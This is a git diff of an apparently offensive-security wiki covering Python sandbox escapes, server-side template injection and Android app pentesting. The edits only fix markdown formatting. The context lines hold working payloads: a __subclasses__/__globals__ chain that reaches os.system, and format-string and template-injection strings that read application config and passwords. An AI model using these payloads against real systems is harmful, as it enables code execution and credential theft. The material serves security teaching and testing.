@@ -223,11 +223,11 @@ class_obj.__init__.__globals__
 [<class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.FileFinder'>, <class 'zipimport.zipimporter'>, <class 'zipimport._ZipImportResourceReader'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class 'types.DynamicClassAttribute'>, <class 'types._GeneratorWrapper'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class 'reprlib.Repr'>, <class 'functools.partialmethod'>, <class 'functools.singledispatchmethod'>, <class 'functools.cached_property'>, <class 'contextlib._GeneratorContextManagerBase'>, <class 'contextlib._BaseExitStack'>, <class 'sre_parse.State'>, <class 'sre_parse.SubPattern'>, <class 'sre_parse.Tokenizer'>, <class 're.Scanner'>, <class 'rlcompleter.Completer'>, <class 'dis.Bytecode'>, <class 'string.Template'>, <class 'cmd.Cmd'>, <class 'tokenize.Untokenizer'>, <class 'inspect.BlockFinder'>, <class 'inspect.Parameter'>, <class 'inspect.BoundArguments'>, <class 'inspect.Signature'>, <class 'bdb.Bdb'>, <class 'bdb.Breakpoint'>, <class 'traceback.FrameSummary'>, <class 'traceback.TracebackException'>, <class '__future__._Feature'>, <class 'codeop.Compile'>, <class 'codeop.CommandCompiler'>, <class 'code.InteractiveInterpreter'>, <class 'pprint._safe_key'>, <class 'pprint.PrettyPrinter'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class 'threading._RLock'>, <class 'threading.Condition'>, <class 'threading.Semaphore'>, <class 'threading.Event'>, <class 'threading.Barrier'>, <class 'threading.Thread'>, <class 'subprocess.CompletedProcess'>, <class 'subprocess.Popen'>]
 ```
 
-[**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds **of **places **were you can find the **globals**.
+[**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **globals**.
 
 ## Discover Arbitrary Execution
 
-Here I want to explain how to easily discover** more dangerous functionalities loaded **and propose more reliable exploits.
+Here I want to explain how to easily discover **more dangerous functionalities loaded** and propose more reliable exploits.
 
 #### Accessing subclasses with bypasses
 
@@ -267,13 +267,13 @@ For example, knowing that with the library **`sys`** it's possible to **import a
 ['_ModuleLock', '_DummyModuleLock', '_ModuleLockManager', 'ModuleSpec', 'FileLoader', '_NamespacePath', '_NamespaceLoader', 'FileFinder', 'zipimporter', '_ZipImportResourceReader', 'IncrementalEncoder', 'IncrementalDecoder', 'StreamReaderWriter', 'StreamRecoder', '_wrap_close', 'Quitter', '_Printer', 'WarningMessage', 'catch_warnings', '_GeneratorContextManagerBase', '_BaseExitStack', 'Untokenizer', 'FrameSummary', 'TracebackException', 'CompletedProcess', 'Popen', 'finalize', 'NullImporter', '_HackedGetData', '_localized_month', '_localized_day', 'Calendar', 'different_locale', 'SSLObject', 'Request', 'OpenerDirector', 'HTTPPasswordMgr', 'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler', 'URLopener', '_PaddedFile', 'CompressedValue', 'LogRecord', 'PercentStyle', 'Formatter', 'BufferingFormatter', 'Filter', 'Filterer', 'PlaceHolder', 'Manager', 'LoggerAdapter', '_LazyDescr', '_SixMetaPathImporter', 'MimeTypes', 'ConnectionPool', '_LazyDescr', '_SixMetaPathImporter', 'Bytecode', 'BlockFinder', 'Parameter', 'BoundArguments', 'Signature', '_DeprecatedValue', '_ModuleWithDeprecations', 'Scrypt', 'WrappedSocket', 'PyOpenSSLContext', 'ZipInfo', 'LZMACompressor', 'LZMADecompressor', '_SharedFile', '_Tellable', 'ZipFile', 'Path', '_Flavour', '_Selector', 'JSONDecoder', 'Response', 'monkeypatch', 'InstallProgress', 'TextProgress', 'BaseDependency', 'Origin', 'Version', 'Package', '_Framer', '_Unframer', '_Pickler', '_Unpickler', 'NullTranslations']
 ```
 
-There are a lot, and** we just need one** to execute commands:
+There are a lot, and **we just need one** to execute commands:
 
 ```python
 [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls")
 ```
 
-We can do the same thing with** other libraries** that we know can be used to** execute commands**:
+We can do the same thing with **other libraries** that we know can be used to **execute commands**:
 
 ```python
 #os
@@ -331,7 +331,7 @@ pdb:
 """
 ```
 
-Moreover, if you think **other libraries** may be able to** invoke functions to execute commands**, we can also **filter by functions names** inside the possible libraries:
+Moreover, if you think **other libraries** may be able to **invoke functions to execute commands**, we can also **filter by functions names** inside the possible libraries:
 
 ```python
 bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"]
@@ -496,7 +496,7 @@ You can check the output of this script in this page:
 
 ## Python Format String
 
-If you **send **a **string **to python that is going to be **formatted**, you can use `{}` to access **python internal information. **You can use the previous examples to access globals or builtins for example.
+If you **send** a **string** to python that is going to be **formatted**, you can use `{}` to access **python internal information.** You can use the previous examples to access globals or builtins for example.
 
 {% hint style="info" %}
 However, there is a **limitation**, you can only use the symbols `.[]`, so you **won't be able to execute arbitrary code**, just to read information. \
@@ -523,7 +523,7 @@ st = "{people_obj.__init__.__globals__[CONFIG][KEY]}"
 get_name_for_avatar(st, people_obj = people)
 ```
 
-Note how you can **access attributes **in a normal way with a **dot **like `people_obj.__init__` and **dict element **with **parenthesis **without quotes `__globals__[CONFIG]`
+Note how you can **access attributes** in a normal way with a **dot** like `people_obj.__init__` and **dict element** with **parenthesis** without quotes `__globals__[CONFIG]`
 
 Also note that you can use `.__dict__` to enumerate elements of an object `get_name_for_avatar("{people_obj.__init__.__globals__[os].__dict__}", people_obj = people)`
 
@@ -730,7 +730,7 @@ dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x0
 ## Compiling Python
 
 Now, lets imagine that somehow you can **dump the information about a function that you cannot execute** but you **need** to **execute** it.\
-Like in the following example, you **can access the code object **of that function, but just reading the disassemble you **don't know how to calculate the flag** (_imagine a more complex `calc_flag` function_)
+Like in the following example, you **can access the code object** of that function, but just reading the disassemble you **don't know how to calculate the flag** (_imagine a more complex `calc_flag` function_)
 
 ```python
 def get_flag(some_input):
@@ -770,7 +770,7 @@ function_type(code_obj, mydict, None, None, None)("secretcode")
 ### Recreating a leaked function
 
 {% hint style="warning" %}
-In the following example we are going to take all the data needed to recreate the function from the function code object directly. In a** real example**, all the **values** to execute the function **`code_type`** is what **you will need to leak**.
+In the following example we are going to take all the data needed to recreate the function from the function code object directly. In a **real example**, all the **values** to execute the function **`code_type`** is what **you will need to leak**.
 {% endhint %}
 
 ```python
@@ -830,7 +830,7 @@ f(42)
 
 ## Decompiling Compiled Python
 
-Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com)** **one can **decompile** given compiled python code
+Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code
 
 ## References
 
diff --git a/misc/basic-python/magic-methods.md b/misc/basic-python/magic-methods.md
index efd43787..23d479b4 100644
--- a/misc/basic-python/magic-methods.md
+++ b/misc/basic-python/magic-methods.md
@@ -2,11 +2,11 @@
 
 ## Class Methods
 
-You can access the **methods **of a **class **using **\__dict\_\_.**
+You can access the **methods** of a **class** using **\_\_dict\_\_.**
 
 ![](<../../.gitbook/assets/image (42).png>)
 
-You can access the functions 
+You can access the functions&#x20;
 
 ![](<../../.gitbook/assets/image (45).png>)
 
@@ -14,23 +14,23 @@ You can access the functions
 
 ### **Attributes**
 
-You can access the **attributes of an object** using** \__dict\_\_**. Example:
+You can access the **attributes of an object** using **\_\_dict\_\_**. Example:
 
 ![](<../../.gitbook/assets/image (41).png>)
 
 ### Class
 
-You can access the **class **of an object using **\__class\_\_**
+You can access the **class** of an object using **\_\_class\_\_**
 
 ![](<../../.gitbook/assets/image (43).png>)
 
-You can access the **methods **of the **class **of an **object chainning **magic functions:
+You can access the **methods** of the **class** of an **object chainning** magic functions:
 
 ![](<../../.gitbook/assets/image (44).png>)
 
 ## Server Side Template Injection
 
-Interesting functions to exploit this vulnerability 
+Interesting functions to exploit this vulnerability&#x20;
 
 ```
 __init__.__globals__
@@ -39,7 +39,7 @@ __class__.__init__.__globals__
 
 Inside the response search for the application (probably at the end?)
 
-Then **access the environment content** of the application where you will hopefully find **some passwords **of interesting information:
+Then **access the environment content** of the application where you will hopefully find **some passwords** of interesting information:
 
 ```
 __init__.__globals__[<name>].config
@@ -54,5 +54,5 @@ __class__.__init__.__globals__[<name>].__dict__.config
 
 * [https://rushter.com/blog/python-class-internals/](https://rushter.com/blog/python-class-internals/)
 * [https://docs.python.org/3/reference/datamodel.html](https://docs.python.org/3/reference/datamodel.html)
-* [https://balsn.tw/ctf_writeup/20190603-facebookctf/#events](https://balsn.tw/ctf_writeup/20190603-facebookctf/#events)
+* [https://balsn.tw/ctf\_writeup/20190603-facebookctf/#events](https://balsn.tw/ctf\_writeup/20190603-facebookctf/#events)
 * [https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0](https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0) (events)
diff --git a/mobile-apps-pentesting/android-app-pentesting/README.md b/mobile-apps-pentesting/android-app-pentesting/README.md
index 2630cc53..79aaf77b 100644
--- a/mobile-apps-pentesting/android-app-pentesting/README.md
+++ b/mobile-apps-pentesting/android-app-pentesting/README.md
@@ -143,11 +143,11 @@ A good way to test this is to try to capture the traffic using some proxy like B
 
 ### Broken Cryptography
 
-#### Poor Key Management Processes <a href="poorkeymanagementprocesses" id="poorkeymanagementprocesses"></a>
+#### Poor Key Management Processes <a href="#poorkeymanagementprocesses" id="poorkeymanagementprocesses"></a>
 
 Some developers save sensitive data in the local storage and encrypt it with a key hardcoded/predictable in the code. This shouldn't be done as some reversing could allow attackers to extract the confidential information.
 
-#### Use of Insecure and/or Deprecated Algorithms <a href="useofinsecureandordeprecatedalgorithms" id="useofinsecureandordeprecatedalgorithms"></a>
+#### Use of Insecure and/or Deprecated Algorithms <a href="#useofinsecureandordeprecatedalgorithms" id="useofinsecureandordeprecatedalgorithms"></a>
 
 Developers shouldn't use **deprecated algorithms** to perform authorisation **checks**, **store** or **send** data. Some of these algorithms are: RC4, MD4, MD5, SHA1... If **hashes** are used to store passwords for example, hashes brute-force **resistant** should be used with salt.
 
@@ -169,7 +169,7 @@ Read the following page to learn how to easily access javascript code of React a
 
 ### Xamarin Applications
 
-**Xamarin** apps are written in **C#**, in order to access the C# code **decompressed, **you need to get the files from the **apk**:
+**Xamarin** apps are written in **C#**, in order to access the C# code **decompressed,** you need to get the files from the **apk**:
 
 ```bash
 7z r app.apk #Or any other zip decompression cmd
@@ -181,13 +181,13 @@ Then, decompress all the DLsL using [**xamarin-decompress**](https://github.com/
 python3 xamarin-decompress.py -o /path/to/decompressed/apk
 ```
 
-&#x20;and finally you can use [**these recommended tools**](../../reversing/reversing-tools-basic-methods/#net-decompiler) to** read C# code** from the DLLs.
+&#x20;and finally you can use [**these recommended tools**](../../reversing/reversing-tools-basic-methods/#net-decompiler) to **read C# code** from the DLLs.
 
 ### Automated Static Code Analysis
 
 The tool [**mariana-trench**](https://github.com/facebook/mariana-trench) is capable of finding **vulnerabilities** by **scanning** the **code** of the application. This tool contains a series of **known sources** (that indicates to the tool the **places** where the **input** is **controlled by the user**), **sinks** (which indicates to the tool **dangerous** **places** where malicious user input could cause damages) and **rules**. These rules indicates the **combination** of **sources-sinks** that indicates a vulnerability.
 
-With this knowledge,** mariana-trench will review the code and find possible vulnerabilities on it**.
+With this knowledge, **mariana-trench will review the code and find possible vulnerabilities on it**.
 
 ### Other interesting functions
 
@@ -223,7 +223,7 @@ You can use some **emulator** like:
 * [**Android Studio**](https://developer.android.com/studio) **(**You can create **x86** and **arm** devices, and according to [**this** ](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**latest x86** versions **support ARM libraries** without needing an slow arm emulator).&#x20;
   * If you want to try to **install** an **image** and then you want to **delete it** you can do that on Windows:`C:\Users\<User>\AppData\Local\Android\sdk\system-images\` or Mac: `/Users/myeongsic/Library/Android/sdk/system-image`&#x20;
   * This is the **main emulator I recommend to use and you can**[ **learn to set it up in this page**](avd-android-virtual-device.md).
-* [**Genymotion**](https://www.genymotion.com/fun-zone/) **(\_Free version: **Personal Edition**, you need to **create** an **account.\_)
+* [**Genymotion**](https://www.genymotion.com/fun-zone/) **(\_Free version:** Personal Edition**, you need to** create **an** account.\_)
 * [Nox](https://es.bignox.com) (Free, but it doesn't support Frida or Drozer).
 
 {% hint style="info" %}
@@ -263,12 +263,12 @@ Anyway, it's still recommended to **not log sensitive information**.
 
 Android provides **clipboard-based** framework to provide copy-paste function in android applications. But this creates serious issue when some **other application** can **access** the **clipboard** which contain some sensitive data. **Copy/Paste** function should be **disabled** for **sensitive part** of the application. For example, disable copying credit card details.
 
-#### Crash Logs <a href="crashlogs" id="crashlogs"></a>
+#### Crash Logs <a href="#crashlogs" id="crashlogs"></a>
 
 If an application **crashes** during runtime and it **saves logs** somewhere then those logs can be of help to an attacker especially in cases when android application cannot be reverse engineered. Then, avoid creating logs when applications crashes and if logs are sent over the network then ensure that they are sent over an SSL channel.\
 As pentester, **try to take a look to these logs**.
 
-#### Analytics Data Sent To 3rd Parties <a href="analyticsdatasentto3rdparties" id="analyticsdatasentto3rdparties"></a>
+#### Analytics Data Sent To 3rd Parties <a href="#analyticsdatasentto3rdparties" id="analyticsdatasentto3rdparties"></a>
 
 Most of the application uses other services in their application like Google Adsense but sometimes they **leak some sensitive data** or the data which is not required to sent to that service. This may happen because of the developer not implementing feature properly. You can **look by intercepting the traffic** of the application and see whether any sensitive data is sent to 3rd parties or not.
 
diff --git a/mobile-apps-pentesting/android-app-pentesting/adb-commands.md b/mobile-apps-pentesting/android-app-pentesting/adb-commands.md
index 5e6e1a0b..2965e61f 100644
--- a/mobile-apps-pentesting/android-app-pentesting/adb-commands.md
+++ b/mobile-apps-pentesting/android-app-pentesting/adb-commands.md
@@ -10,7 +10,7 @@ C:\Users\<username>\AppData\Local\Android\sdk\platform-tools\adb.exe
 /Users/<username>/Library/Android/sdk/platform-tools/adb
 ```
 
-**Information obtained from: **[**http://adbshell.com/**](http://adbshell.com)****
+**Information obtained from:** [**http://adbshell.com/**](http://adbshell.com)****
 
 ## Connection
 
@@ -18,7 +18,7 @@ C:\Users\<username>\AppData\Local\Android\sdk\platform-tools\adb.exe
 adb devices
 ```
 
-This will list the connected devices; if "_**unathorised**_" appears, this means that you have to **unblock **your **mobile **and **accept **the connection.
+This will list the connected devices; if "_**unathorised**_" appears, this means that you have to **unblock** your **mobile** and **accept** the connection.
 
 This indicates to the device that it has to start and adb server in port 5555:
 
@@ -59,7 +59,7 @@ root
 
 ### Port Tunneling
 
-In case the **adb** **port** is only **accessible** from **localhost** in the android device but **you have access via SSH**, you can** forward the port 5555** and connect via adb:
+In case the **adb** **port** is only **accessible** from **localhost** in the android device but **you have access via SSH**, you can **forward the port 5555** and connect via adb:
 
 ```bash
 ssh -i ssh_key username@10.10.10.10 -L 5555:127.0.0.1:5555 -p 2222
@@ -280,7 +280,7 @@ flashing/restoring Android update.zip packages.
 
 ### Logcat
 
-To** filter the messages of only one application**, get the PID of the application and use grep (linux/macos) or findstr (windows) to filter the output of logcat:
+To **filter the messages of only one application**, get the PID of the application and use grep (linux/macos) or findstr (windows) to filter the output of logcat:
 
 ```
 adb logcat | grep 4526
diff --git a/mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md b/mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md
index b7003fab..17b5dc47 100644
--- a/mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md
+++ b/mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md
@@ -18,13 +18,13 @@
 
 ### Sandboxing
 
-The **Android Application Sandbox **allows to run **each application** as a **separate process under a separate user ID**. Each process has its own virtual machine, so an app’s code runs in isolation from other apps.\
+The **Android Application Sandbox** allows to run **each application** as a **separate process under a separate user ID**. Each process has its own virtual machine, so an app’s code runs in isolation from other apps.\
 From Android 5.0(L) **SELinux** is enforced. Basically, SELinux denied all process interactions and then created policies to **allow only the expected interactions between them**.
 
 ### Permissions
 
-When you installs an **app and it ask for permissions**, the app is asking for the permissions configured in the **`uses-permission`** elements in the **AndroidManifest.xml **file. The **uses-permission** element indicates the name of the requested permission inside the **name** **attribute. **It also has the **maxSdkVersion** attribute which stops asking for permissions on versions higher than the one specified.\
-Note that android applications don't need to ask for all the permissions at the beginning, they can also **ask for permissions dynamically **but all the permissions must be **declared** in the **manifest.**
+When you installs an **app and it ask for permissions**, the app is asking for the permissions configured in the **`uses-permission`** elements in the **AndroidManifest.xml** file. The **uses-permission** element indicates the name of the requested permission inside the **name** **attribute.** It also has the **maxSdkVersion** attribute which stops asking for permissions on versions higher than the one specified.\
+Note that android applications don't need to ask for all the permissions at the beginning, they can also **ask for permissions dynamically** but all the permissions must be **declared** in the **manifest.**
 
 When an app exposes functionality it can limit the **access to only apps that have a specified permission**.\
 A permission element has three attributes:
@@ -39,7 +39,7 @@ A permission element has three attributes:
 
 ## Pre-Installed Applications
 
-These apps are generally found in the **`/system/app`** or **`/system/priv-app`** directories and some of them are **optimised **(you may not even find the `classes.dex` file). Theses applications are worth checking because some times they are **running with too many permissions** (as root).
+These apps are generally found in the **`/system/app`** or **`/system/priv-app`** directories and some of them are **optimised** (you may not even find the `classes.dex` file). Theses applications are worth checking because some times they are **running with too many permissions** (as root).
 
 * The ones shipped with the **AOSP** (Android OpenSource Project) **ROM**
 * Added by the device **manufacturer**
@@ -50,7 +50,7 @@ These apps are generally found in the **`/system/app`** or **`/system/priv-app`*
 In order to obtain root access into a physical android device you generally need to **exploit** 1 or 2 **vulnerabilities** which use to be **specific** for the **device** and **version**.\
 Once the exploit has worked, usually the Linux `su` binary is copied into a location specified in the user's PATH env variable like `/system/xbin`.
 
-Once the su binary is configured, another Android app is used to interface with the `su` binary and **process requests for root access **like **Superuser** and **SuperSU **(available in Google Play store).
+Once the su binary is configured, another Android app is used to interface with the `su` binary and **process requests for root access** like **Superuser** and **SuperSU** (available in Google Play store).
 
 {% hint style="danger" %}
 Note that the rooting process is very dangerous and can damage severely the device
@@ -61,17 +61,17 @@ Note that the rooting process is very dangerous and can damage severely the devi
 It's possible to **replace the OS installing a custom firmware**. Doing this it's possible to extend the usefulness of an old device, bypass software restrictions or gain access to the latest Android code.\
 **OmniROM** and **LineageOS** are two of the most popular firmwares to use.
 
-Note that **not always is necessary to root the device** to install a custom firmware. **Some manufacturers allow **the unlocking of their bootloaders in a well-documented and safe manner.
+Note that **not always is necessary to root the device** to install a custom firmware. **Some manufacturers allow** the unlocking of their bootloaders in a well-documented and safe manner.
 
 ### Implications
 
 Once a device is rooted, any app could request access as root. If a malicious application gets it, it can will have access to almost everything and it will be able to damage the phone.
 
-## Android Application Fundamentals <a href="2-android-application-fundamentals" id="2-android-application-fundamentals"></a>
+## Android Application Fundamentals <a href="#2-android-application-fundamentals" id="2-android-application-fundamentals"></a>
 
 This introduction is taken from [https://maddiestone.github.io/AndroidAppRE/app\_fundamentals.html](https://maddiestone.github.io/AndroidAppRE/app\_fundamentals.html)
 
-### Fundamentals Review <a href="fundamentals-review" id="fundamentals-review"></a>
+### Fundamentals Review <a href="#fundamentals-review" id="fundamentals-review"></a>
 
 * Android applications are in the _APK file format_. **APK is basically a ZIP file**. (You can rename the file extension to .zip and use unzip to open and see its contents.)
 * APK Contents (Not exhaustive)
@@ -127,9 +127,9 @@ Improper implementation could result in data leakage, restricted functions being
 
 An Intent Filter specify the **types of Intent that an activity, service, or Broadcast Receiver can respond to**. It specifies what an activity or service can do and what types of broadcasts a Receiver can handle. It allows the corresponding component to receive Intents of the declared type. Intent Filters are typically **defined via the AndroidManifest.xml file**. For **Broadcast Receiver** it is also possible to define them in **coding**. An Intent Filter is defined by its category, action and data filters. It can also contain additional metadata.
 
-In Android, an activity/service/content provider/broadcast receiver is **public **when **`exported`** is set to **`true`** but a component is **also public** if the **manifest specifies an Intent filter** for it. However,\
+In Android, an activity/service/content provider/broadcast receiver is **public** when **`exported`** is set to **`true`** but a component is **also public** if the **manifest specifies an Intent filter** for it. However,\
 developers can **explicitly make components private** (regardless of any intent filters)\
-by setting the** `exported` attribute to `false`** for each component in the manifest file.\
+by setting the ** `exported` attribute to `false`** for each component in the manifest file.\
 Developers can also set the **`permission`** attribute to **require a certain permission to access** the component, thereby restricting access to the component.
 
 ### Implicit Intents
@@ -175,7 +175,7 @@ context.startService(intent);
 
 ### Pending Intents
 
-These allow other applications to **take actions on behalf of your application**, using your app's identity and permissions. Constructing a Pending Intent it should be **specified an intent and the action to perform**. If the **declared intent isn't Explicit** (doesn't declare which intent can call it) a** malicious application could perform the declared action** on behalf of the victim app. Moreover,** if an action ins't specified**, the malicious app will be able to do **any action on behalf the victim**.
+These allow other applications to **take actions on behalf of your application**, using your app's identity and permissions. Constructing a Pending Intent it should be **specified an intent and the action to perform**. If the **declared intent isn't Explicit** (doesn't declare which intent can call it) a **malicious application could perform the declared action** on behalf of the victim app. Moreover, **if an action ins't specified**, the malicious app will be able to do **any action on behalf the victim**.
 
 ### Broadcast Intents
 
@@ -185,7 +185,7 @@ Alternatively it's also possible to **specify a permission when sending the broa
 
 There are **two types** of Broadcasts: **Normal** (asynchronous) and **Ordered** (synchronous). The **order** is base on the **configured priority within the receiver** element. **Each app can process, relay or drop the Broadcast.**
 
-It's possible to **send** a **broadcast** using the function **`sendBroadcast(intent, receiverPermission)` **from the `Context` class.\
+It's possible to **send** a **broadcast** using the function **`sendBroadcast(intent, receiverPermission)` ** from the `Context` class.\
 You could also use the function **`sendBroadcast`** from the **`LocalBroadCastManager`** ensures the **message never leaves the app**. Using this you won't even need to export a receiver component.
 
 ### Sticky Broadcasts
@@ -198,7 +198,7 @@ If you find functions containing the word "sticky" like **`sendStickyBroadcast`*
 
 ## Deep links / URL schemes
 
-**Deep links allow to trigger an Intent via URL**. An application can declare an **URL schema **inside and activity so every time the Android device try to **access an address using that schema** the applications activity will be called:&#x20;
+**Deep links allow to trigger an Intent via URL**. An application can declare an **URL schema** inside and activity so every time the Android device try to **access an address using that schema** the applications activity will be called:&#x20;
 
 ![](<../../.gitbook/assets/image (214).png>)
 
@@ -252,7 +252,7 @@ These include: **Activities, Services, Broadcast Receivers and Providers.**
 
 An **Android activity** is one screen of the **Android** app's user interface. In that way an **Android activity** is very similar to windows in a desktop application. An **Android** app may contain one or more activities, meaning one or more screens.
 
-The **launcher activity** is what most people think of as the **entry point **to an Android application. The launcher activity is the activity that is started when a user clicks on the icon for an application. You can determine the launcher activity by looking at the application’s manifest. The launcher activity will have the following MAIN and LAUNCHER intents listed.
+The **launcher activity** is what most people think of as the **entry point** to an Android application. The launcher activity is the activity that is started when a user clicks on the icon for an application. You can determine the launcher activity by looking at the application’s manifest. The launcher activity will have the following MAIN and LAUNCHER intents listed.
 
 Keep in mind that not every application will have a launcher activity, especially apps without a UI. Examples of applications without a UI (and thus a launcher activity) are pre-installed applications that perform services in the background, such as voicemail.
 
@@ -325,7 +325,7 @@ Note that **Ordered Broadcasts can drop the Intent received or even modify it**
 
 Content Providers are the way **apps share structured data**, such as relational databases. Therefore, it's very important to use **permissions** and set the appropriate protection level to protect them.\
 Content Providers can use the **`readPermission`** and **`writePermission`** attributes to specify which permissions an app must have. **These permissions take precedence over the permission attribute**.\
-Moreover, they can also **allow temporary exceptions **by setting the **`grantUriPermission`** to true and then configuring the appropriate parameters in the **`grant-uri-permission`** element within the provider element inside the manifest file.
+Moreover, they can also **allow temporary exceptions** by setting the **`grantUriPermission`** to true and then configuring the appropriate parameters in the **`grant-uri-permission`** element within the provider element inside the manifest file.
 
 The **`grant-uri-permission`** has three attributes: path, pathPrefix and pathPattern:
 
@@ -349,7 +349,7 @@ It's **important to validate and sanitise the received input** to avoid potentia
 
 #### FileProvider
 
-This is a type of Content Provider that will** share files **from a folder. You can declare a file provider like this:
+This is a type of Content Provider that will **share files** from a folder. You can declare a file provider like this:
 
 ```markup
 <provider android:name="androidx.core.content.FileProvider"
@@ -362,7 +362,7 @@ This is a type of Content Provider that will** share files **from a folder. You
 ```
 
 Note the **`android:exported`** attribute because if it's **`true`** external applications will be able to access the shared folders.\
-Note that the configuration `android:resource="@xml/filepaths"` is indicating that the file _res/xml/filepaths.xml_ contains the configuration of **which folders** this **FileProvider **is going to **share**. This is an example of how to indicate to share a folder in that file:
+Note that the configuration `android:resource="@xml/filepaths"` is indicating that the file _res/xml/filepaths.xml_ contains the configuration of **which folders** this **FileProvider** is going to **share**. This is an example of how to indicate to share a folder in that file:
 
 ```markup
 <paths>
@@ -370,8 +370,8 @@ Note that the configuration `android:resource="@xml/filepaths"` is indicating th
 </paths>
 ```
 
-Sharing something like **`path="."`** could be **dangerous **even if the provider isn't exported if there is other vulnerability in some part of the code that tried to access this provider.\
-You could **access **an **image **inside that folder with `content://com.example.myapp.fileprovider/myimages/default_image.jpg`
+Sharing something like **`path="."`** could be **dangerous** even if the provider isn't exported if there is other vulnerability in some part of the code that tried to access this provider.\
+You could **access** an **image** inside that folder with `content://com.example.myapp.fileprovider/myimages/default_image.jpg`
 
 The `<paths>` element can have multiple children, each specifying a different directory to share. In addition to the **`<files-path>`** element, you can use the **`<external-path>`** element to share directories in **external storage**, and the **`<cache-path>`** element to share directories in your **internal cache directory**.\
 [For more information about specific file providers attributes go here.](https://developer.android.com/reference/androidx/core/content/FileProvider)
@@ -401,9 +401,9 @@ If **`true`** is passed to **`setAllowContentAccess`**, **WebViews will be able
 
 By default, local files can be accessed by WebViews via file:// URLs, but there are several ways to prevent this behaviour:
 
-* Passing **`false`** to **`setAllowFileAccess`**, prevents the access to the filesystem with the exception of assets via `file:///android_asset`_ and _`file:///android_res`. These paths should be used only for non-sensitive data (like images) so this should be safe.
+* Passing **`false`** to **`setAllowFileAccess`**, prevents the access to the filesystem with the exception of assets via `file:///android_asset` _and_ `file:///android_res`. These paths should be used only for non-sensitive data (like images) so this should be safe.
 * The method **`setAllowFileAccess`** indicates if a path from a `file://` URL should be able to access the content from other file scheme URLs.
-* The method **`setAllowUniversalAccessFromFileURLs`** indicates if a path from a `file:// `URL should be able to access content from any origin.
+* The method **`setAllowUniversalAccessFromFileURLs`** indicates if a path from a `file://` URL should be able to access content from any origin.
 
 ## Other App components
 
@@ -421,6 +421,6 @@ By default, local files can be accessed by WebViews via file:// URLs, but there
 
 ## Mobile Device Management
 
-MDM or Mobile Device Management are software suits that are used to **ensure a control and security requirements **over mobile devices. These suites use the features referred as Device Administration API and require an Android app to be installed.
+MDM or Mobile Device Management are software suits that are used to **ensure a control and security requirements** over mobile devices. These suites use the features referred as Device Administration API and require an Android app to be installed.
 
 Generally the MDM solutions perform functions like enforcing password policies, forcing the encryption of storage and enable remote wiping of device data.
diff --git a/mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md b/mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md
index e1322616..71320a74 100644
--- a/mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md
+++ b/mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md
@@ -1,6 +1,6 @@
 # Burp Suite Configuration for Android
 
-**This tutorial was taken from: **[**https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533**](https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533)****
+**This tutorial was taken from:** [**https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533**](https://medium.com/@ehsahil/basic-android-security-testing-lab-part-1-a2b87e667533)****
 
 ## Add a proxy in Burp Suite to listen.
 
@@ -24,7 +24,7 @@ Testing connection over http and https using devices browser.
 
 1. http:// (working) tested — [http://ehsahil.com](http://ehsahil.com)
 
-![](https://miro.medium.com/max/700/1\*LJ2uhK2JqKYY_wYkH3jwbw.png)
+![](https://miro.medium.com/max/700/1\*LJ2uhK2JqKYY\_wYkH3jwbw.png)
 
 2\. https:// certificate error — https://google.com
 
@@ -42,7 +42,7 @@ Click on **CA certificate download the certificate.**
 
 The downloaded certificate is in cacert.der extension and Android 5.\* does not recognise it as certificate file.
 
-You can download the cacert file using your desktop machine and rename it from cacert.der to cacert.crt and drop it on Android device and certificate will be automatically added into **file:///sd_card/downloads.**
+You can download the cacert file using your desktop machine and rename it from cacert.der to cacert.crt and drop it on Android device and certificate will be automatically added into **file:///sd\_card/downloads.**
 
 **Installing the downloaded certificate.**
 
diff --git a/mobile-apps-pentesting/android-app-pentesting/android-task-hijacking.md b/mobile-apps-pentesting/android-app-pentesting/android-task-hijacking.md
index 92fb7876..95747804 100644
--- a/mobile-apps-pentesting/android-app-pentesting/android-task-hijacking.md
+++ b/mobile-apps-pentesting/android-app-pentesting/android-task-hijacking.md
@@ -36,7 +36,7 @@ Android usually manages several tasks
 ### Task affinity and Launch Modes
 
 **Task affinity** is an attribute that is defined in each `<activity>` tag in the `AndroidManifest.xml` file. It describes which Task an Activity prefers to join.\
-By default, every activity has the same affinity as the **package **name.
+By default, every activity has the same affinity as the **package** name.
 
 We'll be using this when creating our PoC app.
 
